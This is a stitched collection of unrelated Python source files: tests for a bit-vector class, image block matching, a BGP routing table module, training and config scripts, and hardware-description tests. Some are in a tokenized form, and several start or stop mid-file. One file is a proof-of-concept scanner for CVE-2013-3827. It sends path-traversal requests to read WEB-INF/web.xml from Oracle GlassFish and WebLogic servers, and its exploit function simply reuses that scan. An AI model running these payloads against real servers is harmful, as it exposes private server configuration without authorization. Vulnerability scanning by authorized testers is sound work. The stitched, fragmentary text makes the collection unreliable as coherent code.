self<block_start>self.assertFalse(bits(""))<line_sep>self.assertTrue(bits("1"))<line_sep>self.assertTrue(bits("01"))<line_sep>self.assertTrue(bits("0"))<line_sep>self.assertTrue(bits("00"))<block_end><def_stmt>test_int self<block_start>self.assertEqual(int(bits("1010")) 0b1010)<block_end><def_stmt>test_str self<block_start>self.assertEqual(str(bits("")) "")<line_sep>self.assertEqual(str(bits("0000")) "0000")<line_sep>self.assertEqual(str(bits("1010")) "1010")<line_sep>self.assertEqual(str(bits("01010")) "01010")<block_end><def_stmt>test_bytes self<block_start>self.assertEqual(bytes(bits("")) b"")<line_sep>self.assertEqual(bytes(bits("10100101")) b"\xa5")<line_sep>self.assertEqual(bytes(bits("110100101")) b"\xa5\x01")<block_end><def_stmt>test_repr self<block_start>self.assertEqual(repr(bits("")) r"bits('')")<line_sep>self.assertEqual(repr(bits("1010")) r"bits('1010')")<block_end><def_stmt>test_getitem_int self<block_start>some=bits("10001001011")<line_sep>self.assertEqual(some[0] 1)<line_sep>self.assertEqual(some[2] 0)<line_sep>self.assertEqual(some[5] 0)<line_sep>self.assertEqual(some[-1] 1)<line_sep>self.assertEqual(some[-2] 0)<line_sep>self.assertEqual(some[-5] 1)<block_end><def_stmt>test_getitem_slice self<block_start>some=bits("10001001011")<line_sep>self.assertBits(some[:] 11 0b10001001011)<line_sep>self.assertBits(some[2:] 9 0b100010010)<line_sep>self.assertBits(some[2:9] 7 0b0010010)<line_sep>self.assertBits(some[2:-2] 7 0b0010010)<line_sep>self.assertBits(some[3:2] 0 0b0)<block_end><def_stmt>test_getitem_wrong self<block_start><with_stmt>self.assertRaisesRegex(TypeError r"bits indices must be integers or slices, not str")<block_start>bits()["x"]<block_end><block_end><def_stmt>test_iter self<block_start>some=bits("10001001011")<line_sep>self.assertEqual(list(some) [1 1 0 1 0 0 1 0 0 0 1])<block_end><def_stmt>test_eq self<block_start>self.assertEqual(bits("1010") 0b1010)<line_sep>self.assertEqual(bits("1010") "1010")<line_sep>self.assertEqual(bits("1010") bits("1010"))<line_sep>self.assertNotEqual(bits("0010") 0b0010)<line_sep>self.assertNotEqual(bits("0010") "010")<line_sep>self.assertNotEqual(bits("1010") bits("01010"))<line_sep>self.assertNotEqual(bits("1010") <none>)<block_end><def_stmt>test_add self<block_start>self.assertBits(bits("1010")+bits("1110") 8 0b11101010)<line_sep>self.assertBits(bits("1010")+(0 1 1 1) 8 0b11101010)<line_sep>self.assertBits((0 1 1 1)+bits("1010") 8 0b10101110)<block_end><def_stmt>test_mul self<block_start>self.assertBits(bits("1011")<times>4 16 0b1011101110111011)<line_sep>self.assertBits(4<times>bits("1011") 16 0b1011101110111011)<block_end><def_stmt>test_and self<block_start>self.assertBits(bits("1010")&bits("1100") 4 0b1000)<line_sep>self.assertBits(bits("1010")&"1100" 4 0b1000)<line_sep>self.assertBits((0 1 0 1)&bits("1100") 4 0b1000)<block_end><def_stmt>test_or self<block_start>self.assertBits(bits("1010")|bits("1100") 4 0b1110)<line_sep>self.assertBits(bits("1010")|"1100" 4 0b1110)<line_sep>self.assertBits((0 1 0 1)|bits("1100") 4 0b1110)<block_end><def_stmt>test_xor self<block_start>self.assertBits(bits("1010")^bits("1100") 4 0b0110)<line_sep>self.assertBits(bits("1010")^"1100" 4 0b0110)<line_sep>self.assertBits((0 1 0 1)^bits("1100") 4 0b0110)<block_end><def_stmt>test_reversed self<block_start>self.assertBits(bits("1010").reversed() 4 0b0101)<block_end><def_stmt>test_find self<block_start>self.assertEqual(bits("1011").find(bits("11")) 0)<line_sep>self.assertEqual(bits("1011").find(bits("10")) 
2)<line_sep>self.assertEqual(bits("1011").find(bits("01")) 1)<line_sep>self.assertEqual(bits("1011").find(bits("00")) -1)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 0) 1)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 2) 4)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 5) 7)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 8) -1)<line_sep>self.assertEqual(bits("1011").find(bits((1 0))) 1)<block_end><block_end>
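
A short usage sketch (added here, not part of the original test file) illustrating the LSB-to-MSB ordering described in the bits docstring: iteration and byte conversion run LSB first, while str() prints MSB first like an integer literal. The printed values follow directly from the assertions above:

b = bits("1010")                 # parsed MSB-first, like an integer literal
print(int(b))                    # 10
print(list(b))                   # [0, 1, 0, 1]  (LSB first)
print(str(b))                    # "1010"        (MSB first)
print(bytes(bits("110100101")))  # b'\xa5\x01'   (little-endian bytes)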
|
import numpy as np


def precompute_BM(img, kHW, NHW, nHW, tauMatch):
    """
    :search for similar patches
    :param img: input image
    :param kHW: length of side of patch
    :param NHW: how many patches are stacked
    :param nHW: length of side of search area
    :param tauMatch: threshold determine whether two patches are similar
    :return ri_rj_N__ni_nj: The top N most similar patches to the referred patch
    :return threshold_count: according to tauMatch how many patches are similar to the referred one
    """
    img = img.astype(np.float64)
    height, width = img.shape
    Ns = 2 * nHW + 1
    threshold = tauMatch * kHW * kHW
    sum_table = np.ones((Ns, Ns, height, width)) * 2 * threshold  # di, dj, ph, pw
    row_add_mat, column_add_mat = get_add_patch_matrix(height, width, nHW, kHW)
    diff_margin = np.pad(np.ones((height - 2 * nHW, width - 2 * nHW)), nHW, 'constant', constant_values=0.)
    sum_margin = (1 - diff_margin) * 2 * threshold

    for di in range(-nHW, nHW + 1):
        for dj in range(-nHW, nHW + 1):
            t_img = translation_2d_mat(img, right=-dj, down=-di)
            diff_table_2 = (img - t_img) * (img - t_img) * diff_margin
            sum_diff_2 = row_add_mat @ diff_table_2 @ column_add_mat
            sum_table[di + nHW, dj + nHW] = np.maximum(sum_diff_2, sum_margin)

    # sum_table (2n+1, 2n+1, height, width)
    sum_table = sum_table.reshape((Ns * Ns, height * width))  # di_dj, ph_pw
    sum_table_T = sum_table.transpose((1, 0))  # ph_pw__di_dj
    argsort = np.argpartition(sum_table_T, range(NHW))[:, :NHW]
    argsort[:, 0] = (Ns * Ns - 1) // 2
    argsort_di = argsort // Ns - nHW
    argsort_dj = argsort % Ns - nHW
    near_pi = argsort_di.reshape((height, width, -1)) + np.arange(height)[:, np.newaxis, np.newaxis]
    near_pj = argsort_dj.reshape((height, width, -1)) + np.arange(width)[np.newaxis, :, np.newaxis]
    ri_rj_N__ni_nj = np.concatenate((near_pi[:, :, :, np.newaxis], near_pj[:, :, :, np.newaxis]), axis=-1)

    sum_filter = np.where(sum_table_T < threshold, 1, 0)
    threshold_count = np.sum(sum_filter, axis=1)
    threshold_count = closest_power_of_2(threshold_count, max_=NHW)
    threshold_count = threshold_count.reshape((height, width))
    return ri_rj_N__ni_nj, threshold_count


def get_add_patch_matrix(h, w, nHW, kHW):
    row_add = np.eye(h - 2 * nHW)
    row_add = np.pad(row_add, nHW, 'constant')
    row_add_mat = row_add.copy()
    for k in range(1, kHW):
        row_add_mat += translation_2d_mat(row_add, right=k, down=0)

    column_add = np.eye(w - 2 * nHW)
    column_add = np.pad(column_add, nHW, 'constant')
    column_add_mat = column_add.copy()
    for k in range(1, kHW):
        column_add_mat += translation_2d_mat(column_add, right=0, down=k)
    return row_add_mat, column_add_mat


def translation_2d_mat(mat, right, down):
    mat = np.roll(mat, right, axis=1)
    mat = np.roll(mat, down, axis=0)
    return mat


def closest_power_of_2(M, max_):
    M = np.where(max_ < M, max_, M)
    while max_ > 1:
        M = np.where((max_ // 2 < M) * (M < max_), max_ // 2, M)
        max_ //= 2
    return M


if __name__ == '__main__':
    import os
    import cv2
    from utils import add_gaussian_noise, symetrize

    # <hyper parameter>
    # ref_i, ref_j = 196, 142
    ref_i, ref_j = 164, 135
    # ref_i, ref_j = 271, 206
    kHW = 8
    NHW = 3
    nHW = 16
    tauMatch = 2500
    # <hyper parameter \>

    im = cv2.imread('test_data/image/Cameraman.png', cv2.IMREAD_GRAYSCALE)
    im = im[100:, :]
    ref_i, ref_j = 64, 135
    im_noisy = add_gaussian_noise(im, 10, seed=1)
    img_noisy_p = symetrize(im_noisy, nHW)
    near_pij, threshold_count = precompute_BM(img_noisy_p, kHW=kHW, NHW=NHW, nHW=nHW, tauMatch=tauMatch)

    im = cv2.cvtColor(img_noisy_p, cv2.COLOR_GRAY2RGB)
    # <draw search area>
    points_list = [(ref_j - nHW, ref_i - nHW), (ref_j + nHW, ref_i - nHW),
                   (ref_j - nHW, ref_i + nHW), (ref_j + nHW, ref_i + nHW)]
    for point in points_list:
        cv2.circle(im, point, 0, (0, 0, 255), 1)
    # <draw search area \>
    # <draw reference patch>
    cv2.rectangle(im, (ref_j, ref_i), (ref_j + kHW, ref_i + kHW), color=(255, 0, 0), thickness=1)
    # <draw reference patch \>
    # <draw similar patches>
    count = threshold_count[ref_i, ref_j]
    for i, Pnear in enumerate(near_pij[ref_i, ref_j]):
        if i == 0:
            continue
        if i > count:
            break
        y, x = Pnear
        cv2.rectangle(im, (x, y), (x + kHW, y + kHW), color=(0, 255, 0), thickness=1)
    # <draw similar patches \>
    # cv2.imshow('im', im)
    # cv2.waitKey()
    cv2.imwrite('BM_real_im_test.png', im)
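
For reference, a direct (slow) version of the quantity the vectorized loop above stores in sum_table, added here as an approximation that ignores the border masking: the sum of squared differences between the kHW x kHW patch anchored at (i, j) and the patch displaced by (di, dj).

def patch_distance(img, i, j, di, dj, kHW):
    # Naive SSD between two top-left-anchored patches; for illustration only.
    a = img[i:i + kHW, j:j + kHW].astype(float)
    b = img[i + di:i + di + kHW, j + dj:j + dj + kHW].astype(float)
    return ((a - b) ** 2).sum()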
|
import os

from django.db import connection as conn

from . import migration_sql_helpers as msh
from api.iam.test.iam_test_case import IamTestCase


class TestMigrationSQLHelpers(IamTestCase):
    def test_find_func_dir(self):
        """
        Test success finding function dir
        """
        self.assertNotEqual(msh.find_db_functions_dir(), "")

    def test_no_find_func_dir(self):
        """
        Test failure finding function dir
        """
        with self.assertRaises(FileNotFoundError):
            msh.find_db_functions_dir("___________no_dir_here_____________")

    def test_apply_sql_file(self):
        """
        Test apply sql file
        """
        filename = "./___test_apply_sql_file.sql"
        try:
            with open(filename, "wt") as f:
                print("select 1;", file=f)
            self.assertEqual(msh.apply_sql_file(conn.schema_editor(), filename), True)
        finally:
            os.unlink(filename)

    def test_no_apply_sql_file(self):
        """
        Test failure applying sql file
        """
        filename = "./___test_apply_sql_file.sql"
        try:
            with open(filename, "wt") as f:
                print("select 1;", file=f)
            with self.assertRaises(TypeError):
                msh.apply_sql_file(None, filename)
        finally:
            os.unlink(filename)
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np

import mindspore
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.ops import operations as P

context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")


class Net(nn.Cell):
    def __init__(self):
        super(Net, self).__init__()
        self.unsorted_segment_sum = P.UnsortedSegmentSum()
        self.num_segments = 3

    def construct(self, x, segment_ids):
        x = self.unsorted_segment_sum(x, segment_ids, self.num_segments)
        return x


def test_net():
    input_x = np.random.randn(3, 39, 1).astype(np.float32)
    segment_ids = Tensor([0, 1, 2], mindspore.int32)
    net = Net()
    output = net(Tensor(input_x), segment_ids)
    print("result", output.asnumpy())


if __name__ == "__main__":
    test_net()
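
For reference, a small NumPy sketch (an assumption added here, not part of the MindSpore test) of the semantics being exercised: each slice of x along axis 0 is added into the output slot named by its segment id, so with segment_ids [0, 1, 2] and 3 segments the input is copied through unchanged.

def unsorted_segment_sum_np(x, segment_ids, num_segments):
    # Scatter-add rows of x into num_segments buckets.
    out = np.zeros((num_segments,) + x.shape[1:], dtype=x.dtype)
    for row, seg in zip(x, segment_ids):
        out[seg] += row
    return out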
|
import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Javafaces LFI''',
        "description": '''An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 192.168.127.12.0, 192.168.127.12.0, and 192.168.127.12.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.''',
        "severity": "medium",
        "references": [
            "https://nvd.nist.gov/vuln/detail/CVE-2013-3827",
            "https://www.exploit-db.com/exploits/38802",
            "https://www.oracle.com/security-alerts/cpuoct2013.html"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2013-3827",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2013", "lfi", "javafaces", "oracle"],
    }


# Vender Fingerprint
def fingerprint(url):
    return True


# Proof of Concept
def poc(url):
    result = {}
    try:
        url = format_url(url)
        paths = [
            "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
            "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
            "/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
            "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
            "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF",
            "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
            "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF",
            "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
            "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
            "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        ]
        for path in paths:
            resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
            if resp.status_code == 200 and "<web-app" in resp.text and "</web-app>" in resp.text:
                result["success"] = True
                result["info"] = info()
                result["payload"] = url + path
                return result
    except:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    return poc(url)


# Utils
def format_url(url):
    url = url.strip()
    if not (url.startswith('http://') or url.startswith('https://')):
        url = 'http://' + url
    url = url.rstrip('/')
    return url
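
A small driver sketch (added for illustration; the hostname below is a placeholder, not from the original script) showing how the poc helper is typically invoked:

if __name__ == "__main__":
    report = poc("target.example.com")
    if report.get("success"):
        print("vulnerable:", report["payload"])
    else:
        print("target not affected or unreachable")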
|
from droidlet.memory.memory_nodes import PlayerNode


class HeuristicPerception:
    def __init__(self, agent):
        self.agent = agent

    def perceive(self):
        bots = self.agent.world.get_bots()
        for bot in bots:
            # print(f"[Perception INFO]: Perceived bot [{bot.name}] in the world, update in memory]")
            bot_node = self.agent.memory.get_player_by_eid(bot.entityId)
            if bot_node is None:
                memid = PlayerNode.create(self.agent.memory, bot)
                bot_node = PlayerNode(self.agent.memory, memid)
                self.agent.memory.tag(memid, "bot")
            bot_node.update(self.agent.memory, bot, bot_node.memid)
            print(f"[Memory INFO]: update bot [{bot.name}] position: ({bot.pos.x}, {bot.pos.y}, {bot.pos.z})")

        bot_memids = self.agent.memory.get_memids_by_tag("bot")
        bots_in_world = [b.entityId for b in bots]
        for memid in bot_memids:
            bot_eid = self.agent.memory.get_mem_by_id(memid).eid
            if bot_eid not in bots_in_world:
                self.agent.memory.forget(memid)
                print(f"[Memory INFO]: delete bot [{bot_eid}] from memory")
|
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Defines data types and models required specifically for RTC support.
"""<import_stmt>logging<import_from_stmt>ryu.lib.packet.bgp RF_RTC_UC<import_from_stmt>ryu.services.protocols.bgp.info_base.base Destination<import_from_stmt>ryu.services.protocols.bgp.info_base.base NonVrfPathProcessingMixin<import_from_stmt>ryu.services.protocols.bgp.info_base.base Path<import_from_stmt>ryu.services.protocols.bgp.info_base.base Table<line_sep>LOG=logging.getLogger('bgpspeaker.info_base.rtc')<class_stmt>RtcTable(Table)<block_start>"""Global table to store RT membership information.
Uses `RtDest` to store destination information for each known RT NLRI path.
"""<line_sep>ROUTE_FAMILY=RF_RTC_UC<def_stmt>__init__ self core_service signal_bus<block_start>Table.__init__(self <none> core_service signal_bus)<block_end><def_stmt>_table_key self rtc_nlri<block_start>"""Return a key that will uniquely identify this RT NLRI inside
this table.
"""<line_sep><return>str(rtc_nlri.origin_as)+':'+rtc_nlri.route_target<block_end><def_stmt>_create_dest self nlri<block_start><return>RtcDest(self nlri)<block_end><def_stmt>__str__ self<block_start><return>'RtcTable(scope_id: %s, rf: %s)'%(self.scope_id self.route_family)<block_end><block_end><class_stmt>RtcDest(Destination NonVrfPathProcessingMixin)<block_start>ROUTE_FAMILY=RF_RTC_UC<def_stmt>_new_best_path self new_best_path<block_start>NonVrfPathProcessingMixin._new_best_path(self new_best_path)<block_end><def_stmt>_best_path_lost self<block_start>NonVrfPathProcessingMixin._best_path_lost(self)<block_end><block_end><class_stmt>RtcPath(Path)<block_start>ROUTE_FAMILY=RF_RTC_UC<def_stmt>__init__ self source nlri src_ver_num pattrs=<none> nexthop='0.0.0.0' is_withdraw=<false> med_set_by_target_neighbor=<false><block_start>Path.__init__(self source nlri src_ver_num pattrs nexthop is_withdraw med_set_by_target_neighbor)<block_end><block_end>
|
##
# Copyright (c) 2005-2017 Apple Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# DRI: <NAME>, <EMAIL>
##
from txweb2.iweb import IResponse

import txweb2.dav.test.util
from txweb2.test.test_server import SimpleRequest


class OPTIONS(txweb2.dav.test.util.TestCase):
    """
    OPTIONS request
    """
    def test_DAV1(self):
        """
        DAV level 1
        """
        return self._test_level("1")

    def test_DAV2(self):
        """
        DAV level 2
        """
        return self._test_level("2")

    test_DAV2.todo = "DAV level 2 unimplemented"

    def test_ACL(self):
        """
        DAV ACL
        """
        return self._test_level("access-control")

    def _test_level(self, level):
        def doTest(response):
            response = IResponse(response)

            dav = response.headers.getHeader("dav")
            if not dav:
                self.fail("no DAV header: %s" % (response.headers,))
            self.assertIn(level, dav, "no DAV level %s header" % (level,))

            return response

        return self.send(SimpleRequest(self.site, "OPTIONS", "/"), doTest)
|
# The following comments couldn't be translated into the new config version:
# prescale
import FWCore.ParameterSet.Config as cms

#
#
# \author <NAME>
#
EcalPhiSymMonDQM = cms.EDAnalyzer(
    "HLTAlCaMonEcalPhiSym",
    # product to monitor
    AlCaStreamEBTag=cms.untracked.InputTag("hltAlCaPhiSymStream", "phiSymEcalRecHitsEB"),
    SaveToFile=cms.untracked.bool(False),
    FileName=cms.untracked.string('MonitorAlCaEcalPhiSym.root'),
    AlCaStreamEETag=cms.untracked.InputTag("hltAlCaPhiSymStream", "phiSymEcalRecHitsEE"),
    prescaleFactor=cms.untracked.int32(1),
    # DQM folder to write to
    FolderName=cms.untracked.string('AlCaReco/EcalPhiSym'),
)
|
import numpy as np
from contextlib import suppress


def convolve_linear(signal, filter, output_size):
    out = np.zeros(output_size)
    sum = 0

    for i in range(output_size[0]):
        for j in range(output_size[1]):
            for k in range(max(0, i - filter.shape[0]), i + 1):
                for l in range(max(0, j - filter.shape[1]), j + 1):
                    with suppress(IndexError):
                        sum += signal[k, l] * filter[i - k, j - l]
            out[i, j] = sum
            sum = 0

    return out


def create_gaussian_kernel(kernel_size):
    kernel = np.zeros((kernel_size, kernel_size))

    # The center must be offset by 0.5 to find the correct index
    center = kernel_size * 0.5 + 0.5

    sigma = np.sqrt(0.1 * kernel_size)

    def kernel_function(x, y):
        return np.exp(-((x - center + 1) ** 2 + (y - center + 1) ** 2) / (2 * sigma ** 2))

    kernel = np.fromfunction(kernel_function, (kernel_size, kernel_size))
    return kernel / np.linalg.norm(kernel)


def create_sobel_operators():
    Sx = np.dot([[1.0], [2.0], [1.0]], [[-1.0, 0.0, 1.0]]) / 9
    Sy = np.dot([[-1.0], [0.0], [1.0]], [[1.0, 2.0, 1.0]]) / 9
    return Sx, Sy


def sum_matrix_dimensions(mat1, mat2):
    return (mat1.shape[0] + mat2.shape[0], mat1.shape[1] + mat2.shape[1])


def compute_sobel(signal):
    Sx, Sy = create_sobel_operators()
    Gx = convolve_linear(signal, Sx, sum_matrix_dimensions(signal, Sx))
    Gy = convolve_linear(signal, Sy, sum_matrix_dimensions(signal, Sy))
    return np.sqrt(np.power(Gx, 2) + np.power(Gy, 2))


def create_circle(image_resolution, grid_extents, radius):
    out = np.zeros((image_resolution, image_resolution))

    for i in range(image_resolution):
        x_position = ((i * grid_extents / image_resolution) - 0.5 * grid_extents)
        for j in range(image_resolution):
            y_position = ((j * grid_extents / image_resolution) - 0.5 * grid_extents)
            if x_position ** 2 + y_position ** 2 <= radius ** 2:
                out[i, j] = 1.0

    return out


def main():
    # Random distribution in x
    x = np.random.rand(100, 100)

    # Gaussian signals
    def create_gaussian_signals(i, j):
        return np.exp(-(((i - 50) / 100) ** 2 + ((j - 50) / 100) ** 2) / .01)

    y = np.fromfunction(create_gaussian_signals, (100, 100))

    # Normalization is not strictly necessary, but good practice
    x /= np.linalg.norm(x)
    y /= np.linalg.norm(y)

    # full convolution, output will be the size of x + y
    full_linear_output = convolve_linear(x, y, sum_matrix_dimensions(x, y))

    # simple boundaries
    simple_linear_output = convolve_linear(x, y, x.shape)

    np.savetxt("full_linear.dat", full_linear_output)
    np.savetxt("simple_linear.dat", simple_linear_output)

    # creating simple circle and 2 different Gaussian kernels
    circle = create_circle(50, 2, 0.5)
    circle = circle / np.linalg.norm(circle)

    small_kernel = create_gaussian_kernel(3)
    large_kernel = create_gaussian_kernel(25)

    small_kernel_output = convolve_linear(circle, small_kernel,
                                          sum_matrix_dimensions(circle, small_kernel))
    large_kernel_output = convolve_linear(circle, large_kernel,
                                          sum_matrix_dimensions(circle, large_kernel))

    np.savetxt("small_kernel.dat", small_kernel_output)
    np.savetxt("large_kernel.dat", large_kernel_output)

    circle = create_circle(50, 2, 0.5)

    # Normalization
    circle = circle / np.linalg.norm(circle)

    # using the circle for sobel operations as well
    sobel_output = compute_sobel(circle)
    np.savetxt("sobel_output.dat", sobel_output)
|
# optimizer
optimizer = dict(type='AdamW', lr=0.0001, weight_decay=0.0005)
optimizer_config = dict(grad_clip=dict(max_norm=1, norm_type=2))
# learning policy
lr_config = dict(
    policy='step',
    warmup='linear',
    warmup_iters=1000,
    warmup_ratio=0.001,
    step=[60000, 72000],
    by_epoch=False)
# runtime settings
runner = dict(type='IterBasedRunner', max_iters=80000)
checkpoint_config = dict(by_epoch=False, interval=8000)
evaluation = dict(interval=8000, metric='mIoU')
|
<import_from_stmt>keras.optimizers Adam<import_from_stmt>keras_yolov3.train get_anchors get_classes data_generator_wrapper<import_from_stmt>keras_yolov3.yolov3_class YOLOv3<import_stmt>tensorflow<as>tf<line_sep>config=tf.ConfigProto()<line_sep>config.gpu_options.allow_growth=<true><line_sep>sess=tf.Session(config=config)<line_sep>classes_path='../keras_yolov3/model_data/coco_classes.txt'<line_sep>anchors_path='../keras_yolov3/model_data/yolo_anchors.txt'<line_sep>class_names=get_classes(classes_path)<line_sep>num_classes=len(class_names)<line_sep>anchors=get_anchors(anchors_path)<line_sep>num_anchors=len(anchors)<line_sep>yolov3=YOLOv3(anchors num_classes)<line_sep>model_path='../keras_yolov3/model_data/yolo_weights.h5'<line_sep>yolov3.model.load_weights(model_path by_name=<true> skip_mismatch=<true>)<line_sep>annotation_path='../keras_yolov3/model_data/train.txt'<with_stmt>open(annotation_path)<as>f<block_start>lines=f.readlines()<block_end>num_train=len(lines)<line_sep>batch_size=32<line_sep>yolov3.model.compile(optimizer=Adam(lr=1e-3) loss={'yolo_loss':<lambda>y_true y_pred:y_pred})<line_sep>yolov3.model.fit_generator(data_generator_wrapper(lines batch_size yolov3.input_shape anchors num_classes) steps_per_epoch=max(1 num_train<floordiv>batch_size) epochs=50 initial_epoch=0)<line_sep>
|
<import_from_stmt>functools wraps partial<import_stmt>operator<import_stmt>pytest<import_stmt>magma<as>m<import_from_stmt>magma.smart SmartBit SmartBits concat signed make_smart<import_from_stmt>magma.testing check_files_equal<def_stmt>_run_test func=<none> * skip_check=<false><block_start><if_stmt>func<is><none><block_start><return>partial(_run_test skip_check=skip_check)<block_end>@wraps(func)<def_stmt>_wrapper *args **kwargs<block_start>name=func.__name__<line_sep>ckt=func(*args **kwargs)<line_sep>m.compile(f"build/{name}" ckt output="coreir-verilog" inline=<true>)<line_sep>build=f"build/{name}.v"<line_sep>gold=f"gold/{name}.v"<if_stmt><not>skip_check<block_start><assert_stmt>check_files_equal(__file__ build gold)<block_end><block_end><return>_wrapper<block_end>@_run_test<def_stmt>test_binop # Ops can be add, sub, mul, div, mod, and, or, xor.
<block_start>op=operator.add<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[12]) O1=m.Out(SmartBits[8]) O2=m.Out(SmartBits[12]) O3=m.Out(SmartBits[16]))<line_sep>val=op(io.I0 io.I1)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<line_sep>io.O3<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_comparison # Ops can be eq, ne, ge, gt, le, lt.
<block_start>op=operator.eq<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[12]) O1=m.Out(SmartBits[1]) O2=m.Out(SmartBits[16]))<line_sep>val=op(io.I0 io.I1)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_lshift <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[4]) O1=m.Out(SmartBits[8]) O2=m.Out(SmartBits[16]))<line_sep>val=io.I0<lshift>io.I1<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_rshift <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[4]) O1=m.Out(SmartBits[4]) O2=m.Out(SmartBits[8]) O3=m.Out(SmartBits[16]))<line_sep>val=io.I0<rshift>io.I1<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<line_sep>io.O3<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_concat <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[4]) I2=m.In(SmartBits[10]) O1=m.Out(SmartBits[4]) O2=m.Out(SmartBits[16]))<line_sep>val=concat(io.I0+io.I1 io.I2)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_unary # Ops can be invert, neg.
<block_start>op=operator.invert<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) O1=m.Out(SmartBits[4]) O2=m.Out(SmartBits[16]))<line_sep>val=op(io.I0)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_reduction # Ops can be and, or, xor.
<block_start>op=operator.and_<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) O1=m.Out(SmartBits[1]) O2=m.Out(SmartBits[16]))<line_sep>val=io.I0.reduce(op)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_smoke # NOTE(rsetaluri): We use a CircuitBuilder here just so we can dynamically
# add ports to make the test specification easier. The test just creates a
# bunch of SmartBits values, performs operations on them, and wires them up. This is
# easiest to do and check in the context of a circuit definition. It is also
# (mostly) possible to do this on anonymous values, but that is less convenient.
